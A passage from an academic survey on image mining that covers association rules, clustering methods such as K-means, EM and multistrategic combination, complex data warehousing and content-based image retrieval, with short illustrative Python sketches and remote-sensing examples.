calendric association rules (Ozden, Ramaswamy, & Silberschatz, 1998; Ramaswamy, Mahajan, & Silberschatz, 1998), mining partial periodicities (Han, Dong, & Yin, 1999), rule mining query languages (Meo, Psaila, & Ceri, 1996), mining of quantitative and multidimensional rules (Fukuda, Morimoto, Morishita, & Tokuyama, 1996; Kamber, Han, & Chiang, 1997; Lent, Swami, & Widom, 1997; Miller & Yang, 1997; Srikant & Agrawal, 1996), and mining of frequently occurring patterns related to time or other sequences (Agrawal & Srikant, 1995).
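The following sketch makes the definitions of support and confidence, and the level-wise (Apriori-style) search, concrete on a toy transaction database; the transactions, the minimum-support threshold, and the simplified candidate generation are assumptions made for illustration and do not reproduce the exact algorithms cited above.

```python
from itertools import combinations

# Toy transaction database: each transaction is a set of items (illustrative).
D = [
    {"plants", "compost", "gloves"},
    {"plants", "compost"},
    {"plants", "pots"},
    {"compost", "pots"},
]

def support(itemset, db):
    """Number of transactions containing every item of `itemset`."""
    return sum(1 for t in db if itemset <= t)

def confidence(body, head, db):
    """Conditional probability of `head` given `body`."""
    return support(body | head, db) / support(body, db)

# Level-wise search: (k+1)-itemsets are built from frequent k-itemsets,
# exploiting the monotonicity property ("every subset of a frequent
# itemset is itself frequent").
min_support = 2
items = sorted({i for t in D for i in t})
frequent = [frozenset(c) for c in combinations(items, 1)
            if support(set(c), D) >= min_support]
level = 2
while frequent:
    print(f"frequent {level - 1}-itemsets:", [set(f) for f in frequent])
    candidates = {a | b for a in frequent for b in frequent if len(a | b) == level}
    frequent = [c for c in candidates if support(c, D) >= min_support]
    level += 1

# Example rule: plants => compost
print("conf(plants => compost) =", confidence({"plants"}, {"compost"}, D))
```

On this toy database the rule "plants => compost" has support 2 and confidence 2/3, which is exactly the usefulness/certainty pair discussed above.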
Data Clustering The goal of clustering is to identify subsets of data called clusters (or groups), where a cluster usually corresponds to objects that are more similar to each other than they are to objects from other clusters. There are different ways to group objects. In hard clustering, each object belongs to one and only one cluster: the clusters are disjoint. In a soft approach, clusters can overlap: an object can belong to zero, one, or several clusters. The probabilistic approach assumes that each object belongs to each cluster with a certain probability. Finally, in a fuzzy clustering approach, each object belongs to all the clusters with an assigned membership degree for each cluster. Although a great many clustering algorithms have been developed for a wide range of application fields, no single one can solve all problems (Kleinberg, 2002). Comprehensive surveys of clustering principles and techniques can be found in Berkhin (2002), Jain, Murty, and Flynn (1999), and Xu and Wunsch (2005). Traditionally, clustering methods are divided into hierarchical and partitioning techniques. Whereas partitioning algorithms produce a flat structure, hierarchical clustering algorithms organise data into a hierarchical structure such as a tree of clusters or a dendrogram: a cluster node contains child-clusters which are a partitioning of this cluster.
Hierarchical clustering methods, such as CURE (Guha, Rastogi, & Shim, 1998), ROCK (Guha, Rastogi, & Shim, 2000), Chameleon (Karypis, Han, & Kumar, 1999), and BIRCH (Zhang, 1997), are categorised into agglomerative and divisive approaches. Starting with one-object clusters, agglomerative methods iteratively merge clusters, depending on their similarity. Divisive methods start with one cluster containing all objects to be clustered and recursively split clusters until a criterion (number of clusters, size of clusters, etc.) is achieved. To merge or split subsets of objects, the distance between clusters (linkage metric) has to be defined. In fact, most hierarchical clustering algorithms are variants of the single link (minimum distance between objects), the complete link (maximum distance between objects), or the average link; a short sketch at the end of this subsection illustrates the three metrics. The type of link metric used significantly affects results: a complete-link algorithm produces tightly bound or compact clusters (Baeza-Yates, 1992) whereas a single-link algorithm suffers from the chaining effect (Nagy, 1968). While hierarchical algorithms build clusters iteratively, partitioning algorithms learn clusters directly. The most popular partitioning algorithms are partitioning relocation methods. Such a method tries to discover clusters by iteratively relocating data between subsets. These methods can be categorised into probabilistic clustering, for example, the EM framework (Mitchell, 1998), k-medoid methods, such as CLARA (Kaufman & Rousseew, 1990), and squared-error based methods like K-means (MacQueen, 1967). A density-based partitioning algorithm such as DBSCAN (Ester, Kriegel, Dansder, & Xu, 1996) tries to discover dense connected components which are flexible in terms of their shape. Partitioning methods are advantageous in applications involving large data sets for which the construction of a dendrogram is computationally prohibitive. In most cases, however, the difficult
problem is the choice of the number of output clusters. Some methods are proposed to resolve this problem such as ISODATA (Ball & Hall, 1967). In practice, the algorithm is typically run multiple times with different starting states (initial centers of clusters, numbers of clusters), and the “best” output clustering is kept. More complex search methods, such as evolutionary algorithms (Fogel, 1994), can also be used to explore the solution space better and faster. Competitive neural networks are often used to cluster data. Based on data correlation, similar data are grouped by the network and represented by a neurone. Data are presented at the input and are associated with the output neuron; the weights between the input neurons and the output neurons are iteratively changed. Among this type of algorithm, the most popular algorithm is the self-organising map (SOM) (Kohonen, 1990).
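The sketch announced above illustrates the single-, complete-, and average-link metrics on two small clusters; the points and the choice of Euclidean distance are arbitrary examples, not taken from any of the systems surveyed here.

```python
import math

def euclidean(a, b):
    return math.dist(a, b)

def single_link(c1, c2):
    """Minimum distance between any pair of objects from the two clusters."""
    return min(euclidean(a, b) for a in c1 for b in c2)

def complete_link(c1, c2):
    """Maximum distance between any pair of objects from the two clusters."""
    return max(euclidean(a, b) for a in c1 for b in c2)

def average_link(c1, c2):
    """Mean distance over all pairs of objects from the two clusters."""
    return sum(euclidean(a, b) for a in c1 for b in c2) / (len(c1) * len(c2))

cluster_a = [(0.0, 0.0), (1.0, 0.0)]
cluster_b = [(3.0, 0.0), (5.0, 0.0)]
print(single_link(cluster_a, cluster_b))    # 2.0
print(complete_link(cluster_a, cluster_b))  # 5.0
print(average_link(cluster_a, cluster_b))   # 3.5
```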
IMAGE PROCESSING USING DATA WAREHOUSES, PATTERN MINING, AND CLASSIFICATION Different types of information are related to images: those related to a low-level description (pixels, resolution, texture, and size), content information, and lastly, information linked to the context (domain, etc.). The use of this information must take into account data processing: relevant data should be extracted and structured as a preprocessing stage. Complex data warehousing is a solution allowing us to describe analysis contexts. Among all the existing analysis techniques, patterns discovery can outline associations between images, evolution of geographical areas, and so forth. Image clustering is used to summarise and structure data, and can be useful in the case of image content-based retrieval to reduce the search space.
Complex Data Warehouses: How Image Data Can Be Managed in Such Data Warehouses In complex data warehouses, new difficulties appear because of the nature and specificity of the data. Structuring, modeling, and analysing image data is a difficult task that requires the use of efficient techniques and powerful tools, such as data mining. Complex data produce different kinds of information that are represented as metadata. These metadata are essential when warehousing complex data. Furthermore, domain-specific knowledge becomes necessary to warehouse complex data properly, for example, under the form of ontologies. Analysing complex data raises, among others, the issue of selecting analysis axes. Data mining may help reach this goal. Furthermore, OLAP operators are not well suited for non-additive complex data measures. In this context, data mining techniques such as clustering can be used to develop appropriate OLAP operators for complex data (Ben Messaoud, Boussaïd, & Loudcher Rabaseda, 2006). Such data mining techniques allow us to perform exploratory analyses while exploiting causality relationships in complex data. The growing interest in the storage of, and knowledge discovery in, complex data has led research communities to look for new architectures and more suitable processing tools. Indeed, organisations need to deploy data warehouses in order to integrate, access, and analyse their complex data. For example, a medical file usually consists of data drawn from various forms. A patient’s medical history might be recorded as plain text; numerous biological exam results might be differently represented. The medical file could also include radiographies (images) or echographies (video sequences). Successive diagnoses and therapies might be recorded as text or audio documents, and so on. If one needs to explore this kind of data, then the warehousing
approach should be adapted to take into account the specificity of such data. In opposition to classical solutions, complex data warehouse architectures may be numerous and very different from one another. However, two approaches emerge. The first family of architectures is data-driven and based on a classical, centralised data warehouse where data are the main focus. XML document warehouses are an example of such solutions (Boussaid, Ben Messaoud, Choquet, & Anthoard, 2006a; Nassis, Rajagopalapillai, Dillon, & Rahayu, 2005; Pokorny, 2001; Rusu, Rahayu, & Taniar, 2005). They often exploit XML views, which are XML documents generated from whole XML documents and/or parts of XML documents (Baril & Bellahsene, 2000). A data cube is then a set of XML views. The second family of architectures includes solutions based on virtual warehousing, which are process-driven and where metadata play a major role. These solutions are based on mediator-wrapper approaches (Maiz, Boussaïd, & Bentayeb, 2006; Wiederhold, 1995) and exploit distributed data sources. The schemas of such sources provide the most important information that mediators exploit to answer user queries. Data are collected and modeled in a multidimensional way (as data cubes, to constitute an OLAP analysis context) on the fly to answer a given decision support need. Note that complex data are generally represented by descriptors that may either be low-level information (an image size, an audio file duration, the speed of a video sequence, etc.) or related to semantics (relationships between objects in a picture, topic of an audio recording, identification of a character in a video sequence, and so on). Processing the data thus turns out to process their descriptors. Original data are stored, for example, as binary large objects (BLOBs), and can also be exploited to extract information that could enrich their own characteristics (descriptors and metadata) (Boussaid, Tanasescu, Bentayeb, & Darmont, 2006b).
In today’s competitively managed environment, decision makers must be able to interpret trends, identify factors, and utilise information based on clear, timely data presented in a meaningful format. Warehousing complex data, and particularly image data, is well suited to structuring, storing, accessing, and querying these data. The capacity to organise the image data in the data warehouse structure allows us to carry out online analytical processing of the warehoused data. To increase this ability, it is necessary to enhance the classical OLAP operators with data mining techniques, such as clustering or pattern mining, and to elaborate exploratory and predictive analyses (Ben Messaoud et al., 2006).
Pattern Mining Image mining (Simoff, Djeraba, & Zaïane, 2002; Zhang, Hsu, & Lee, 2001) is still a recent research field and is not very well developed yet because extracting relevant knowledge from image data still remains a difficult task. Mining association rules relating to images cannot be considered as simply taking each image as a transaction and computing frequent patterns that occur among different images. Image mining raises some new issues (Han & Kamber, 2001) such as rule mining which considers various resolutions, measures, and rules adjustment to the nature of images as well as a detailed attention to the spatial relationships within the images. In Han and Kamber (2001), three association rule categories are distinguished: associations between image content features and non-image content features, associations among image contents with no spatial relationships, and associations among image contents with spatial relationships. In recent years, there has been some research dealing with rule association mining in image data. In Zaïne, Han, and Zhu (2000), authors have proposed methods for mining content-based associations with recurrent items and with spatial relationships from large visual data repositories.
A progressive resolution refinement approach has been proposed in which frequent itemsets at rough resolution levels are mined and, progressively, finer resolutions are mined only on candidate frequent itemsets derived from mining at the rough resolution levels. The proposed algorithm is an extension of the well-known Apriori algorithm taking account of the number of object occurrences in the images. Ordonez and Omiecinski (1999) state that the image mining problem relates not only to the data mining field, but also to the fields of databases, image understanding, and content-based image retrieval. They proposed a first attempt to combine association rules and images: an algorithm which would discover object association rules in image databases and which would be based on image content. The algorithm relies on four major steps: feature extraction, object identification, auxiliary image creation, and object mining. The main advantage of this approach is that it does not use any domain knowledge and does not produce meaningless rules or false rules. However, it suffers from several drawbacks, most importantly, the relative slowness of the feature extraction step. It does not work well with complex images either. Djeraba (2002) proposes an architecture which integrates knowledge extraction from image databases with the image retrieval process. Association rules are extracted to characterise images, and they are also used to classify new images during insertion. In Tollari, Glotin, and Le Maitre (2005), a recent experiment has been carried out to show the dependencies between textual and visual indexation. This experiment was performed on different corpora containing photographs which were manually indexed by keywords. The authors then compared text-only classification, visual-only classification, and the fusion of textual and visual classification. They have shown that the fusion significantly improves text-only classification.
In Ardizzone, Daurel, Maniscalco, and Rigotti (2001), association rules between low-level descriptors (i.e., colour descriptors) and semantic descriptors (i.e., names of painters) are extracted. The authors recommend using discovered association rules as complementary information to improve indexing and query optimisation in image databases. Finally, in Morin, Kouomou Chopo, and Chauchat (2005), data mining techniques, namely clustering and association rules, are used in order to improve the time and quality of content-based retrieval in an image database. The suggested strategy is based both on an automatic selection of the content-based retrieval features and on association rules in order to reduce the number of descriptors. Thus users may carry out their image searches without being concerned with the nature or quality of the underlying descriptors. The results so obtained remain relatively satisfactory compared to an exhaustive sequential search. Moreover, during search processing, intermediate results are progressively merged and proposed to the user. The brevity of this section dedicated to images and pattern mining shows how small the intersection of these two fields still is. What pattern mining can contribute to image retrieval and image understanding thus remains an open question.
Image Classification Two domains are concerned with image clustering. On one hand, a key step for structuring the database is image content clustering employed in order to improve “search-by-query” in large image databases. Each image is viewed as a collection of local features (a colour histogram, a textural index, etc.). The goal is to find a mapping between the archive images and the classes (clusters) so that the set of classes provides essentially the same prediction, or information, about the image archive as the entire image-set collection. The generated classes provide a concise summarisation and visualisation
of the image content: this process is considered as image-set clustering. Note that the definition of a clustering scheme requires the determination of two major components in the process: the input representation space (the feature space used, global vs. local information) and the distance measure defined in the selected feature space. On the other hand, partitioning the pixels of an image into groups with coherent properties by clustering is a popular method of image segmentation: pixels that are similar in low-level features (e.g., colour or radiometric features) and are connected in the image (4- or 8-connectivity) are grouped into one region. However, the problem lies in the difficulty of defining the similarity measurements, for example, in terms of intensity, colour, texture, or other parameters. Each element can be used alone, but they can also be combined to represent an image pixel. Thus, each pixel can be associated with a feature vector. This section presents three approaches to per-pixel image clustering: the K-means algorithm, the EM algorithm, and the multistrategic approach.
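As a minimal illustration of the two components just mentioned (a feature space and a distance measure), the following sketch computes a normalised grey-level histogram as a global image feature and compares two images with an L1 distance; the synthetic images and the 16-bin histogram are assumptions made only for the example.

```python
import numpy as np

def grey_histogram(image, bins=16):
    """Normalised grey-level histogram used as a global image feature."""
    hist, _ = np.histogram(image, bins=bins, range=(0, 256))
    return hist / hist.sum()

def l1_distance(f1, f2):
    """L1 distance between two feature vectors."""
    return float(np.abs(f1 - f2).sum())

# Two synthetic 8-bit grey-level images (stand-ins for database images).
rng = np.random.default_rng(0)
img_a = rng.integers(0, 256, size=(64, 64))
img_b = rng.integers(0, 256, size=(64, 64))

feat_a, feat_b = grey_histogram(img_a), grey_histogram(img_b)
print("distance(img_a, img_b) =", l1_distance(feat_a, feat_b))
```

In a real system the histogram would be replaced or complemented by colour, texture, or local descriptors, and the distance chosen to match the feature space, but the retrieval and clustering machinery operates on exactly this kind of feature vector.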
The K-means Algorithm The K-means algorithm (MacQueen, 1967) attempts to minimise the cost function $F = \sum_{k \in [1,K]} \sum_{x_i \in C_k} d(x_i, c_k)$, where K is the number of clusters and $c_k$ is the center of the k-th cluster. First, the initial set of centers is randomly chosen. Then, to minimise F, the K-means algorithm iterates two steps:
• Labeling: Each object in the data set is assigned to the nearest cluster.
• Recentering: A new center for all the clusters is recalculated.
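A minimal NumPy rendering of these two steps might look as follows; the random pixel data, the number of clusters, and the fixed iteration count are assumptions for the example rather than part of the original description.

```python
import numpy as np

def kmeans(X, k, n_iter=10, seed=0):
    """Plain K-means: alternate labeling and recentering for n_iter rounds."""
    rng = np.random.default_rng(seed)
    centers = X[rng.choice(len(X), size=k, replace=False)]  # random initial centers
    for _ in range(n_iter):
        # Labeling: assign each object to its nearest center.
        dists = np.linalg.norm(X[:, None, :] - centers[None, :, :], axis=2)
        labels = dists.argmin(axis=1)
        # Recentering: recompute each center as the mean of its members.
        for j in range(k):
            if np.any(labels == j):
                centers[j] = X[labels == j].mean(axis=0)
    return labels, centers

# Example: cluster the pixel values of a 3-band image (reshaped to an
# N x 3 array) into 5 classes.
pixels = np.random.default_rng(1).random((1000, 3))
labels, centers = kmeans(pixels, k=5)
print(centers)
```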
The K-means algorithm is very simple and easy to implement. Its time complexity is O(NKd) where d is the dimension of the objects: such an
algorithm can be used to cluster large data sets such as image data. Figure 1 shows an example of a remotely sensed image. The area (approximately 10 km2) is the eastern part of the agglomeration of Strasbourg (France), with a resolution of 20 m in multispectral mode (three radiometric bands). Its size is 250 x 200 pixels.

Figure 1. SPOT image (Strasbourg)

Figure 2 shows an instance of a K-means run (with 5 classes and 10 iterations) on the SPOT remote sensing image. The circle on the first image (on the left) highlights the sub-area which evolves during the 10 iterations. The area is the downtown of Strasbourg and is composed of building areas. At the beginning, some pixels are blue, a colour which corresponds to the "water" class. One can see that almost all these pixels migrate towards the "gray" class, which corresponds to the class of "building" (in agreement with expert evaluation).
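As an illustration of the labeling/recentering iteration described above, here is a minimal Python sketch; the variable names are illustrative and this is not the authors' implementation.

```python
import numpy as np

def kmeans(X, K, n_iter=10, seed=0):
    """Cluster the rows of X (N x d pixel feature vectors) into K clusters
    by alternating the labeling and recentering steps."""
    rng = np.random.default_rng(seed)
    # Initial centers: K objects drawn at random from the data set.
    centers = X[rng.choice(len(X), size=K, replace=False)].astype(float)
    for _ in range(n_iter):
        # Labeling: assign each object to the nearest center (Euclidean distance).
        dists = np.linalg.norm(X[:, None, :] - centers[None, :, :], axis=2)
        labels = dists.argmin(axis=1)
        # Recentering: recompute each center as the mean of its objects.
        for k in range(K):
            if np.any(labels == k):
                centers[k] = X[labels == k].mean(axis=0)
    return labels, centers

# Example: a 250 x 200 three-band image flattened to (N, 3) pixel vectors.
# labels, centers = kmeans(image.reshape(-1, 3), K=5, n_iter=10)
```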
In model-based clustering, individual clusters are described by a probability distribution. Each pixel is assumed to be produced by a probability density associated with one of the K clusters. The maximum likelihood (ML) approach then considers that the best estimate for $\theta_k$ (the unknown parameter vector of the density associated with the k-th cluster) is the one that maximises the log-likelihood given by:

$\ln(X, \theta) = \sum_{i \in [1,N]} \log \Big( \sum_{k \in [1,K]} \pi_k \, p(x_i \mid \theta_k) \Big)$

where $\pi_k$ is the prior probability for cluster $C_k$. In most circumstances, the solution of the likelihood equation cannot be computed analytically. Efficient iterative Expectation-Maximisation (EM) schemes exist to perform the log-likelihood optimisation (Dempster, 1977; McLachlan, 1997). In such schemes, each object $x_i$ carries not only its observable attributes but also a hidden cluster label vector $z_i$, with $z_{i,k} = 1$ if $x_i$ belongs to cluster $C_k$ and 0 otherwise. Thus the log-likelihood for the complete data set is given by:

$E(X, \theta) = \sum_{i \in [1,N]} \sum_{k \in [1,K]} z_{i,k} \log p(x_i \mid \theta_k)$
Figure 2. Example of K-means evolution (panels: Iteration 1, Iteration 4, Iteration 8, Final result)
The summation terms inside the log have been eliminated. One can observe that:

•	If the density parameters are known, the cluster label vectors can be easily set.
•	If the cluster label vectors are known, estimating the density parameters is easy.

In fact, the EM algorithm iterates two steps:

•	E-step (Expectation): compute the expectation of the complete data.
•	M-step (Maximisation): maximise the log-likelihood of the complete data and then estimate θ.
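To make these two steps concrete, here is a minimal Python sketch of EM for a Gaussian mixture over pixel feature vectors (full covariance matrices, illustrative names); it is not the authors' implementation, and a library routine such as scikit-learn's GaussianMixture would normally be preferred in practice.

```python
import numpy as np
from scipy.stats import multivariate_normal

def em_gaussian(X, K, n_iter=20, seed=0):
    """EM for a K-component Gaussian mixture over the rows of X (N x d)."""
    rng = np.random.default_rng(seed)
    N, d = X.shape
    pi = np.full(K, 1.0 / K)                                     # priors pi_k
    mu = X[rng.choice(N, size=K, replace=False)].astype(float)   # initial means
    cov = np.array([np.cov(X.T) + 1e-6 * np.eye(d) for _ in range(K)])
    for _ in range(n_iter):
        # E-step: posterior responsibility of cluster k for object x_i.
        resp = np.column_stack([
            pi[k] * multivariate_normal.pdf(X, mean=mu[k], cov=cov[k])
            for k in range(K)
        ])
        resp /= resp.sum(axis=1, keepdims=True)
        # M-step: re-estimate the priors, the means and the covariances.
        Nk = resp.sum(axis=0)
        pi = Nk / N
        mu = (resp.T @ X) / Nk[:, None]
        for k in range(K):
            diff = X - mu[k]
            cov[k] = (resp[:, k, None] * diff).T @ diff / Nk[k] + 1e-6 * np.eye(d)
    return resp.argmax(axis=1), pi, mu, cov
```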
In the case of the multivariate normal (Gaussian) density, the most used for image segmentation, the unknown parameters (the mean and the covariance matrix) of each cluster are estimated by Expectation-Maximisation. Although the K-means and EM algorithms have been quite successful in both theory and practice, they present some problems. First, these algorithms are very sensitive to the selection of the initial partition: they may converge towards a local minimum if the initial partition is not properly chosen. Second, the number of clusters must be known. Unfortunately, there is no efficient and universal method to identify the number of clusters and the initial partitions. Certain strategies can be used to circumvent these problems. The most frequently used one consists in carrying out the algorithms several times with random initial partitions, with or without the same number of clusters, on either the whole data or on subsets of the original data only: the "best" result is then kept. Some techniques deal with the estimation of the number of clusters: ISODATA dynamically adjusts the number of clusters by merging and splitting clusters according to several criteria. Another relatively recent approach can also be used. It is based on the idea that the information concerning objects offered by different classifiers is complementary (Kittler, 1998). Thus,
the combination of different classification methods may increase their efficiency and accuracy. A single classification is produced from the results of methods which have different points of view: all individual classifier opinions are used to derive a consensual decision. Combining methods in this way circumvents some of the limitations of the methods used alone by taking advantage of the complementarities of the different classification methods. For example, some classifiers only propose a partitioning of the data, whereas others give a hierarchy of classes or concepts as a result. Combining the results allows us to automatically adjust the number of clusters of the partitioning methods according to the results presented by the hierarchical methods. Experiments show that this approach decreases the importance of the initial choices. A collaborative multistrategical clustering process is proposed in Gançarski and Wemmert (2005). First, a phase of initial classifications is performed: classifications are computed by each method with its own parameters. Then, an iterative phase of convergence of the results is performed; it is composed of three main steps, repeated as long as the results improve in terms of quality and converge to become more and more similar:

1.	A step of evaluation of the similarity between the results, with mapping of the classes.
2.	A step of refinement of the results: (1) conflict detection by evaluating the dissimilarities between results; (2) local resolution of such conflicts; and (3) management of these local modifications in the global result.
3.	A step of combination of the refined results.
For example, we present a test with six expected classes. The unsupervised classification methods used are:
•	The K-means algorithm with four initial random nodes.
•	The K-means algorithm with eight initial random nodes.
•	The EM algorithm with 15 classes.
•	The conceptual classifier Cobweb with an acuity of 18.
We have obtained the results1 (Figure 3). These results have been refined according to the multistrategical algorithm, and we have obtained the following results (Figure 4). We then applied the multiview voting algorithm described in Wemmert and Gançarski (2002) on these results. The unifying result (Figure 5a) is composed of five different classes. We also present in Figure 5b the voting result for all the objects:

•	In white: All the methods agreed on the classification.
•	In gray: One method disagreed with the other ones.
•	In black: The nonconsensual objects (two or more results classified these objects differently).
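A per-object voting step of this kind could be sketched as follows, assuming the labels of the different results have already been mapped onto a common label set (illustrative code only, not the algorithm of Wemmert and Gançarski, 2002).

```python
import numpy as np

def vote(label_maps):
    """Combine R clusterings of the same N objects.

    label_maps: array of shape (R, N) whose labels are already mapped onto a
    common label set. Returns the majority label and an agreement code per
    object: 2 = unanimous, 1 = one dissenter, 0 = nonconsensual."""
    label_maps = np.asarray(label_maps)
    R, N = label_maps.shape
    majority = np.empty(N, dtype=label_maps.dtype)
    agreement = np.empty(N, dtype=int)
    for i in range(N):
        values, counts = np.unique(label_maps[:, i], return_counts=True)
        best = counts.argmax()
        majority[i] = values[best]
        if counts[best] == R:
            agreement[i] = 2      # white: all the methods agree
        elif counts[best] == R - 1:
            agreement[i] = 1      # gray: one method disagrees
        else:
            agreement[i] = 0      # black: two or more results disagree
    return majority, agreement
```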
IMAGE MINING ISSUES

In this section, we present applications using the concepts described above. The first section tries to give some perspectives for image pattern mining. The second section deals with the extraction of information from images and briefly describes its application to the Semantic Web. The last section describes an application in the field of remote sensing image databases.
Image Pattern Mining

Image pattern mining can be used for images represented by low-level features, such as those of earth exploration applications or images built from sonar or radar signals. These applications have a common point: the notion of evolution is very important. For example, in the case of images extracted from a sonar signal, the characterisation of seabed sediments and of their evolution could be performed using pattern mining techniques. Consider, for example, that the records are grouped according to their localisation (i.e., the geographical areas
Figure 3. Initial clusterings (panels: Kmeans – 4 classes, Kmeans – 8 classes, SOM – 16 classes, Cobweb – 27 classes)

Figure 4. Final clusterings (panels: Kmeans – 5 classes, Kmeans – 6 classes, SOM – 5 classes, Cobweb – 4 classes)

Figure 5. Unification (panels: (a) Unifying result, (b) Consensus)
in which the sonar has been used). Suppose that for one localisation, we have the sediment evolution. Then, it will be easy, using pattern mining techniques, to find common evolutions for a set of localisations. In the case of earth observation, a potential application is to study the evolution of a particular object or geographic area, such as a dense urban area for example. Pattern mining for content-
based image retrieval seems to be less relevant, but should be useful to reduce the search space. Association rules can be defined to determine an image cluster for a particular description. For example, you can state that if the dominant colours are yellow and brown, the images related to this description should be contained in cluster 2. Few experiments have been realised to use such a technique to reduce the search space. We think
that research work could be done in the case of images represented by a set of pixels in order to describe data evolution.
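As an illustration of the kind of rule mentioned above (e.g., dominant colours yellow and brown implying cluster 2), the following sketch counts support and confidence for candidate rules linking discrete descriptors to a cluster label; the data layout, thresholds, and the deliberately naive enumeration are hypothetical choices, not taken from the cited works.

```python
from itertools import combinations

def cluster_rules(transactions, min_support=0.05, min_confidence=0.8):
    """Each transaction is (descriptors, cluster), e.g.
    ({"dominant:yellow", "dominant:brown"}, "cluster2").
    Returns rules antecedent -> cluster with their support and confidence."""
    n = len(transactions)
    counts, ante_totals = {}, {}
    # Candidate antecedents of size 1 or 2 (a real miner would use
    # Apriori-style pruning instead of this exhaustive enumeration).
    for descriptors, cluster in transactions:
        for size in (1, 2):
            for ante in combinations(sorted(descriptors), size):
                counts[(ante, cluster)] = counts.get((ante, cluster), 0) + 1
                ante_totals[ante] = ante_totals.get(ante, 0) + 1
    rules = []
    for (ante, cluster), c in counts.items():
        support = c / n
        confidence = c / ante_totals[ante]
        if support >= min_support and confidence >= min_confidence:
            rules.append((ante, cluster, support, confidence))
    return rules

# Usage sketch:
# rules = cluster_rules([({"dominant:yellow", "dominant:brown"}, "cluster2"), ...])
```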
Clustering and Characterisation Rules at the Service of Image Retrieval by Similarity

Content-based image retrieval in large databases is based on two modules: logical indexing and retrieval. The first one extracts the metadata associated to images (textual descriptors: keywords, annotations, and so forth; visual features like colour, shape, texture; spatial localisation, spatial constraints, etc.) and stores them in the database; the second one assists end users in efficiently retrieving images based on their visual and/or textual descriptions. The retrieval process, by means of a suitable distance for each feature, computes the similarity between the user's query and the images of the database; the most similar images are then displayed by decreasing similarity. In this context, the scope of queries addressed to multimedia databases is very large and may include both objective and subjective content. Three levels of abstraction are distinguished (Eakins, 2002): (1) the syntactic level, where visual features, spatial localisation, and spatial constraints are used to retrieve images; this level is purely algorithmic, and a typical query may be "Give me all the images containing red circles"; (2) the semantic level including only objective content, where objects appearing in images have to be identified; a query example may be "Give me all the images in which my children appear"; (3) the semantic level with subjective content, which involves complex reasoning about objects or scenes using human perception; such a query may be "Give me all the images representing the notion of liberty" or "Give me all the images in which my friends are happy". This last level is also related to scene recognition as, for example, a child's birthday: this scene can be
characterised by balloons, young faces, candles, cakes, and so forth. However, content-based image retrieval has reached some limitations, in particular a lack of semantics integration. Textual and visual feature combinations are sometimes not sufficient, particularly when semantic querying is predominant, that is, when the image and its context are necessary (for instance, the retrieval of audiovisual sequences about unemployment, or the retrieval of images in which there is a strong feeling of sadness). This limit is known as the semantic gap between the visual appearance of an image and the idea, including semantics, that the user has in mind of the images to retrieve. Thus, content-based retrieval suffers from a lack of expressive power because it does not integrate enough semantics. Semantics is today a crucial point which cannot be circumvented as soon as one wishes to integrate, unify, or bring closer the metadata resulting from different sources. A lot of research is going on in this direction. For example, we can mention the fusion of ontologies to search resources regardless of their nature (Hunter, 2001). We can also mention the definition of Web page semantics to improve Web information retrieval, since the semantics of a Web page is expressed both through its contexts (static context: the author's contribution; dynamic context: the user's contribution) and through its content (Grosky, Sreenath, & Fotouhi, 2002). Worth mentioning is also the architecture proposed in Troncy (2003) to reason on descriptions of video documents thanks to an audiovisual ontology. In the context of content-based retrieval, the lack of semantics prevents end users from making good explorations and exploitations of the image database. In Bouet and Aufaure (2006), image mining is proposed to allow for a better image database exploration by exploiting the visual and textual image characterisations in a complementary way. The proposed approach is situated in an exploratory context (descriptive data mining). The desired objective may not be achieved
without a strong synergy between image mining and visual ontology. On the one hand, image mining concerns making associations between images from a large database. To produce a summarised view of an annotated image database and to reduce the search space, clustering and characterisation rules are combined. These data mining techniques are performed separately on visual descriptors and textual information (annotations, keywords, Web pages). On the other hand, a visual ontology is derived from the textual part and enriched with representative images associated to each concept
of the ontology. Ontology-based navigation can also be seen as a user-friendly and powerful tool to retrieve relevant information. These two approaches should make the exploitation and the exploration of a large image database easier. The process called "multimedia mining" is detailed more precisely in Figure 6. Multimedia mining consists of several methods such as clustering and the extraction of characteristic rules from clusters. These clusters and rules extracted from visual and textual descriptors may be seen as metadata associated to the considered image
Figure 6. The multimedia mining process
database. While clustering is performed to reduce the search space, the characterisation rules are used to describe each cluster and to automatically classify a new image into the appropriate clusters. Because of their intrinsically different natures (numeric vs. symbolic), textual descriptions (keywords, annotations, etc.) and visual descriptions (colour, shape, texture, spatial constraints) are dealt with separately, using well-suited techniques. Starting from feature sets (such as a colour set, a keyword set, a texture set, a colour and shape set, etc.), the system automatically clusters together similar images using a well-suited method. Then, in order to qualify the previous clusters, a more powerful representation than the cluster centroid may be chosen. These characterisation rules may be obtained either from all the points of a cluster (in order to have the most frequent patterns) or from a data aggregation (for example, a median histogram in the case of colour clusters, which is representative of the cluster content). In the image context, these rules are of the form antecedent ⇒ consequent with a certain accuracy, where antecedent and consequent correspond respectively to a visual feature value and a cluster. The accuracy is fundamental to estimate the quality of the induced rules, and statistical measures are used to estimate it. As far as textual description processing is concerned, it requires a preprocessing phase in order to reduce the number of keywords and to keep only relevant ones. This task is difficult and time-consuming, and needs an expert to validate the results obtained. A relevant similarity measure also has to be found for textual descriptions. Clustering can be performed by conceptual clustering such as the Cobweb, or by other techniques such as the K-means after the transformation of the initial keywords into numerical vectors. The extracted concepts are then hierarchically organised, using a priori knowledge, hierarchical classification techniques, or the expert's knowledge of the application domain.
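A minimal sketch of that last option, turning keyword annotations into numerical vectors and clustering them with K-means, could look as follows (scikit-learn is used for brevity and the annotations are invented; this is only one possible realisation of the idea).

```python
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.cluster import KMeans

# Hypothetical keyword annotations, one string of keywords per image.
annotations = [
    "beach sea sunset",
    "sea boat harbour",
    "mountain snow ski",
    "snow mountain hiking",
]

# Transform the keywords into numerical (here binary) vectors.
vectorizer = CountVectorizer(binary=True)
X = vectorizer.fit_transform(annotations)

# Cluster the textual descriptions; characterisation rules would then be
# extracted from each resulting cluster.
kmeans = KMeans(n_clusters=2, n_init=10, random_state=0).fit(X)
print(kmeans.labels_)
```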
